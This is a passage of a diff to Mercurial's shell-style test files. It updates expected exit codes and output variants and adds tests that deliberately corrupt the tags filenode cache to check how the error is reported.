note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
custom tag message
second line
--- a/tests/test-tags.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-tags.t Tue Apr 20 11:01:06 2021 -0400
@@ -104,7 +104,7 @@
0010: ff ff ff ff ff ff ff ff b9 15 46 36 26 b7 b4 a7 |..........F6&...|
0020: 73 e0 9e e3 c5 2f 51 0e 19 e0 5e 1f f9 66 d8 59 |s..../Q...^..f.Y|
$ hg debugtagscache
- 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing/invalid
+ 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing
1 b9154636be938d3d431e75a7c906504a079bfe07 26b7b4a773e09ee3c52f510e19e05e1ff966d859
Repeat with cold tag cache:
@@ -381,7 +381,7 @@
$ hg debugtagscache | tail -2
4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
- 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing/invalid
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing
$ hg tags
tip 5:8dbfe60eff30
bar 1:78391a272241
@@ -389,6 +389,77 @@
4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+If the 4 bytes of node hash for a record don't match an existing node, the entry
+is flagged as invalid.
+
+ >>> import os
+ >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp:
+ ... fp.seek(-24, os.SEEK_END) and None
+ ... fp.write(b'\xde\xad') and None
+
+ $ f --size --hexdump .hg/cache/hgtagsfnodes1
+ .hg/cache/hgtagsfnodes1: size=144
+ 0000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+ 0010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+ 0020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+ 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(|
+ 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.|
+ 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..|
+ 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(|
+ 0070: 78 ee 5a 2d ad bc 94 3d de ad e6 0e 0c 04 f2 a8 |x.Z-...=........|
+ 0080: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=|
+
+ $ hg debugtagscache | tail -2
+ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 invalid
+
+ $ hg tags
+ tip 5:8dbfe60eff30
+ bar 1:78391a272241
+
+BUG: If the filenode part of an entry in hgtagsfnodes is corrupt and
+tags2-visible is missing, `hg tags` aborts. Corrupting the leading 4 bytes of
+node hash (as above) doesn't seem to trigger the issue. Also note that the
+debug command hides the corruption, both with and without tags2-visible.
+
+ $ mv .hg/cache/hgtagsfnodes1 .hg/cache/hgtagsfnodes1.bak
+ $ hg debugupdatecaches
+
+ >>> import os
+ >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp:
+ ... fp.seek(-16, os.SEEK_END) and None
+ ... fp.write(b'\xde\xad') and None
+
+ $ f --size --hexdump .hg/cache/hgtagsfnodes1
+ .hg/cache/hgtagsfnodes1: size=144
+ 0000: bb d1 79 df 00 00 00 00 00 00 00 00 00 00 00 00 |..y.............|
+ 0010: 00 00 00 00 00 00 00 00 78 39 1a 27 0c 04 f2 a8 |........x9.'....|
+ 0020: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=|
+ 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(|
+ 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.|
+ 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..|
+ 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(|
+ 0070: 78 ee 5a 2d ad bc 94 3d 8d bf e6 0e 0c 04 f2 a8 |x.Z-...=........|
+ 0080: de ad de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |......B(x.Z-...=|
+
+ $ hg debugtagscache | tail -2
+ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node)
+
+ $ rm -f .hg/cache/tags2-visible
+ $ hg debugtagscache | tail -2
+ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node)
+
+ $ hg tags
+ tip 5:8dbfe60eff30
+ bar 1:78391a272241
+
+BUG: Unless this file is restored, the `hg tags` in the next unix-permissions
+conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found"
+
+ $ mv .hg/cache/hgtagsfnodes1.bak .hg/cache/hgtagsfnodes1
+
#if unix-permissions no-root
Errors writing to .hgtags fnodes cache are silently ignored
@@ -405,7 +476,7 @@
$ hg blackbox -l 6
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> couldn't write cache/hgtagsfnodes1: [Errno *] * (glob)
- 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob)
+ 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6
@@ -420,7 +491,7 @@
$ hg blackbox -l 6
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing 24 bytes to cache/hgtagsfnodes1
- 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob)
+ 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6
--- a/tests/test-template-map.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-template-map.t Tue Apr 20 11:01:06 2021 -0400
@@ -1606,7 +1606,7 @@
$ hg bisect -g 1
$ hg bisect -b 3 --noupdate
- Testing changeset 2:97054abb4ab8 (2 changesets remaining, ~1 tests)
+ Testing changeset 2:97054abb4ab8 "no person" (2 changesets remaining, ~1 tests)
$ hg log -T bisect -r 0:4
changeset: 0:1e4e1b8f71e0
bisect: good (implicit)
--- a/tests/test-transplant.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-transplant.t Tue Apr 20 11:01:06 2021 -0400
@@ -1091,7 +1091,7 @@
transaction abort!
rollback completed
abort: pretxncommit.abort hook exited with status 1
- [255]
+ [40]
$ cat >> .hg/hgrc <<EOF
> [hooks]
> pretxncommit.abort = !
--- a/tests/test-treemanifest.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-treemanifest.t Tue Apr 20 11:01:06 2021 -0400
@@ -832,10 +832,13 @@
Packed bundle
$ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg
- writing 5330 bytes for 18 files
- bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest
+ writing 5330 bytes for 18 files (no-zstd !)
+ writing 5400 bytes for 18 files (zstd !)
+ bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog, treemanifest (rust !)
$ hg debugbundle --spec repo-packed.hg
- none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest
+ none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest (no-rust !)
+ none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog%2Ctreemanifest (rust !)
#endif
--- a/tests/test-unamend.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-unamend.t Tue Apr 20 11:01:06 2021 -0400
@@ -39,7 +39,7 @@
$ hg unamend
abort: changeset must have one predecessor, found 0 predecessors
- [255]
+ [10]
Unamend on clean wdir and tip
--- a/tests/test-uncommit.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-uncommit.t Tue Apr 20 11:01:06 2021 -0400
@@ -114,12 +114,12 @@
$ hg uncommit nothinghere
abort: cannot uncommit "nothinghere"
(file does not exist)
- [255]
+ [10]
$ hg status
$ hg uncommit file-abc
abort: cannot uncommit "file-abc"
(file was not changed in working directory parent)
- [255]
+ [10]
$ hg status
Try partial uncommit, also moves bookmark
@@ -419,7 +419,7 @@
$ hg uncommit
abort: cannot uncommit merge changeset
- [255]
+ [10]
$ hg status
$ hg log -G -T '{rev}:{node} {desc}' --hidden
@@ -585,12 +585,12 @@
$ hg uncommit emptydir
abort: cannot uncommit "emptydir"
(file was untracked in working directory parent)
- [255]
+ [10]
$ cd emptydir
$ hg uncommit .
abort: cannot uncommit "emptydir"
(file was untracked in working directory parent)
- [255]
+ [10]
$ hg status
$ cd ..
--- a/tests/test-up-local-change.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-up-local-change.t Tue Apr 20 11:01:06 2021 -0400
@@ -175,7 +175,7 @@
$ hg up 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ rm b
test conflicting untracked ignored file
@@ -195,7 +195,7 @@
$ hg up 'desc("add ignored file")'
ignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
test a local add
--- a/tests/test-update-branches.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-update-branches.t Tue Apr 20 11:01:06 2021 -0400
@@ -324,7 +324,7 @@
$ hg up -q 4
abort: conflicting changes
(commit or update --clean to discard changes)
- [255]
+ [20]
$ hg up -m 4
merging a
warning: conflicts while merging a! (edit, then use 'hg resolve --mark')
--- a/tests/test-upgrade-repo.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-upgrade-repo.t Tue Apr 20 11:01:06 2021 -0400
@@ -3,6 +3,9 @@
$ cat >> $HGRCPATH << EOF
> [extensions]
> share =
+ > [format]
+ > # stabilize test accross variant
+ > revlog-compression=zlib
> EOF
store and revlogv1 are required in source
@@ -21,7 +24,7 @@
> EOF
$ hg -R no-revlogv1 debugupgraderepo
- abort: cannot upgrade repository; requirement missing: revlogv1
+ abort: cannot upgrade repository; missing a revlog version
[255]
Cannot upgrade shared repositories
@@ -58,9 +61,10 @@
generaldelta: yes
share-safe: no
sparserevlog: yes
- sidedata: no
- persistent-nodemap: no
+ persistent-nodemap: no (no-rust !)
+ persistent-nodemap: yes (rust !)
copies-sdc: no
+ revlog-v2: no
plain-cl-delta: yes
compression: zlib
compression-level: default
@@ -71,11 +75,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usefncache=no
format-variant repo config default
@@ -84,11 +90,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usefncache=no --color=debug
format-variant repo config default
@@ -97,11 +105,13 @@
[formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
[formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
- [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
- [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !)
+ [formatvariant.name.mismatchdefault|persistent-nodemap:][formatvariant.repo.mismatchdefault| yes][formatvariant.config.special| yes][formatvariant.default| no] (rust !)
[formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
- [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib]
+ [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !)
+ [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !)
[formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default]
$ hg debugformat -Tjson
[
@@ -136,21 +146,23 @@
"repo": true
},
{
+ "config": false, (no-rust !)
+ "config": true, (rust !)
+ "default": false,
+ "name": "persistent-nodemap",
+ "repo": false (no-rust !)
+ "repo": true (rust !)
+ },
+ {
"config": false,
"default": false,
- "name": "sidedata",
+ "name": "copies-sdc",
"repo": false
},
{
"config": false,
"default": false,
- "name": "persistent-nodemap",
- "repo": false
- },
- {
- "config": false,
- "default": false,
- "name": "copies-sdc",
+ "name": "revlog-v2",
"repo": false
},
{
@@ -161,7 +173,8 @@
},
{
"config": "zlib",
- "default": "zlib",
+ "default": "zlib", (no-zstd !)
+ "default": "zstd", (zstd !)
"name": "compression",
"repo": "zlib"
},
@@ -177,7 +190,8 @@
performing an upgrade with "--run" will make the following changes:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
processed revlogs:
- all-filelogs
@@ -201,7 +215,8 @@
$ hg debugupgraderepo --quiet
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
processed revlogs:
- all-filelogs
@@ -216,7 +231,8 @@
performing an upgrade with "--run" will make the following changes:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -247,7 +263,8 @@
performing an upgrade with "--run" will make the following changes:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -272,7 +289,8 @@
$ hg debugupgrade --optimize re-delta-parent --quiet
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -303,9 +321,9 @@
generaldelta: no
share-safe: no
sparserevlog: no
- sidedata: no
persistent-nodemap: no
copies-sdc: no
+ revlog-v2: no
plain-cl-delta: yes
compression: zlib
compression-level: default
@@ -316,11 +334,13 @@
generaldelta: no yes yes
share-safe: no no no
sparserevlog: no yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: no yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usegeneraldelta=no
format-variant repo config default
@@ -329,11 +349,13 @@
generaldelta: no no yes
share-safe: no no no
sparserevlog: no no yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: no yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usegeneraldelta=no --color=debug
format-variant repo config default
@@ -342,11 +364,13 @@
[formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes]
[formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes]
- [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
- [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !)
+ [formatvariant.name.mismatchconfig|persistent-nodemap:][formatvariant.repo.mismatchconfig| no][formatvariant.config.special| yes][formatvariant.default| no] (rust !)
[formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
- [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib]
+ [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !)
+ [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !)
[formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default]
$ hg debugupgraderepo
repository lacks features recommended by current config options:
@@ -363,12 +387,16 @@
sparserevlog
in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange.
+ persistent-nodemap (rust !)
+ persist the node -> rev mapping on disk to speedup lookup (rust !)
+ (rust !)
performing an upgrade with "--run" will make the following changes:
requirements
preserved: revlogv1, store
- added: dotencode, fncache, generaldelta, sparserevlog
+ added: dotencode, fncache, generaldelta, sparserevlog (no-rust !)
+ added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !)
fncache
repository will be more resilient to storing certain paths and performance of certain operations should be improved
@@ -382,6 +410,9 @@
sparserevlog
Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server.
+ persistent-nodemap (rust !)
+ Speedup revision lookup by node id. (rust !)
+ (rust !)
processed revlogs:
- all-filelogs
- changelog
@@ -404,7 +435,8 @@
$ hg debugupgraderepo --quiet
requirements
preserved: revlogv1, store
- added: dotencode, fncache, generaldelta, sparserevlog
+ added: dotencode, fncache, generaldelta, sparserevlog (no-rust !)
+ added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !)
processed revlogs:
- all-filelogs
@@ -424,6 +456,9 @@
sparserevlog
in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange.
+ persistent-nodemap (rust !)
+ persist the node -> rev mapping on disk to speedup lookup (rust !)
+ (rust !)
repository lacks features used by the default config options:
dotencode
@@ -434,7 +469,8 @@
requirements
preserved: revlogv1, store
- added: fncache, generaldelta, sparserevlog
+ added: fncache, generaldelta, sparserevlog (no-rust !)
+ added: fncache, generaldelta, persistent-nodemap, sparserevlog (rust !)
fncache
repository will be more resilient to storing certain paths and performance of certain operations should be improved
@@ -445,6 +481,9 @@
sparserevlog
Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server.
+ persistent-nodemap (rust !)
+ Speedup revision lookup by node id. (rust !)
+ (rust !)
processed revlogs:
- all-filelogs
- changelog
@@ -503,7 +542,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, revlogv1, store
+ preserved: dotencode, fncache, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, persistent-nodemap, revlogv1, store (rust !)
added: generaldelta
generaldelta
@@ -544,6 +584,7 @@
$ cat .hg/upgradebackup.*/requires
dotencode
fncache
+ persistent-nodemap (rust !)
revlogv1
store
@@ -553,6 +594,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
store
@@ -604,7 +646,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: sparserevlog
sparserevlog
@@ -632,11 +675,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for * (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ ls -1 .hg/ | grep upgradebackup
[1]
@@ -647,7 +688,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -679,11 +721,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
Check that the repo still works fine
@@ -726,7 +766,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -759,11 +800,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -778,7 +817,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -810,11 +850,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -829,7 +867,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -861,11 +900,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -884,7 +921,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
removed: sparserevlog
optimisations: re-delta-parent
@@ -919,11 +957,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -940,7 +976,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: sparserevlog
optimisations: re-delta-parent
@@ -978,11 +1015,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
